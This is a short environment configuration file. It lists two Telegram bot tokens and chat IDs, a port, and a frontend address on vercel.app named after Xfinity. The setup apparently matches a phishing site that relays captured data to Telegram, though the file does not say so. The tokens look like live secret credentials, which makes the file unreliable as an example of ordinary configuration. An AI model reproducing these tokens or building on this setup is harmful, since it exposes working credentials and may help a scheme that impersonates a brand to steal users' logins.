TELEGRAM_BOT_TOKEN=8095929244:AAHfLyzsmcWV2W-wQGhE4vp4oVbJucNhMuo
TELEGRAM_CHAT_ID=5846011821 
TELEGRAM_BOT_TOKEN_2=7935253417:AAEQY6oroZLWVzVbeN0qxGZ2zZpOt4Vgq4c
TELEGRAM_CHAT_ID_2=5237802709
FRONTEND_URL=https://xfinity-xl2w.vercel.app
PORT=3000

